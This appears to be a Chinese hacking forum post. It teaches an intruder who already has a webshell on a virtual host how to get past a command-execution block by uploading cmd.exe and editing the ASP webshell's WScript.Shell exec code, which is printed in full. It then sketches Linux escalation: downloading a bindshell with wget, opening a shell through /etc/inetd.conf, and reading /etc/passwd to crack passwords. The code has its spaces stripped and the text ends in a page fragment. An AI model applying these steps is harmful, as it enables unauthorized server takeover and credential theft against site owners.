有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机,然后上传一个CMD.exe,然后调用你上传的CMD来执行命令......
本来想搞图文教程的,但感觉太简单,文字就可以说明清楚了
1.打开ASP站长助手6.0点击命令提示符,显示"没有权限"
2.用ASP站长助手6.0上传功能上传一个CMD.exe(在WIN\system32\cmd.exe)到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来)
3.修改你的webshell找到调用CMD.exe的代码
FunctionCmdShell()
IfRequest("cmd")<>""Then
DefCmd=Request("cmd")
Else
DefCmd="Dir"&Session("FolderPath")
EndIf
SI="
"
SI=SI&""
SI=SI&""
SI=SI&server.createobject("wscript.shell").exec("cmd.exe/c"&DefCmd).stdout.readall
SI=SI&Chr(13)&"Rar命令行压缩示例:c:\progra~1\winrar\rar.exead:\web\test\web1.rard:\web\test\web1"
Response.WriteSI
EndFunction
修改成以下载的代码
FunctionCmdShell()
IfRequest("cmd")<>""Then
DefCmd=Request("cmd")
Else
DefCmd="Dir"&Session("FolderPath")
EndIf
SI=""
SI=SI&""
SI=SI&""
SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径/c"&DefCmd).stdout.readall
SI=SI&Chr(13)&"Rar命令行压缩示例:c:\progra~1\winrar\rar.exead:\web\test\web1.rard:\web\test\web1
"
Response.WriteSI
EndFunction
为了大家看得清楚把要修改的提出来就可以
原来的:
SI=SI&server.createobject("wscript.shell").exec("cmd.exe/c"&DefCmd).stdout.readall
修改成:
SI=SI&server.createobject("wscript.shell").exec("你想上传的cmd.exe绝对路径/c"&DefCmd).stdout.readall
比如你上伟到的目录是D:\web\www\cmd.exe那么就修改成:
SI=SI&server.createobject("wscript.shell").exec("D:\web\www\cmd.exe/c"&DefCmd).stdout.readall
这样你的WEBSHELL中的命令提示符就可以用了......
webshell提升forlinux
在zone-h得到了答案,他们是这样干的
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
|
ls-al显示文件
||中间的是显示的命令
很简单的办法是得到用户
最基本的办法是得到用户列表然后用流光跑密码
....etc/passwd
当前位置:
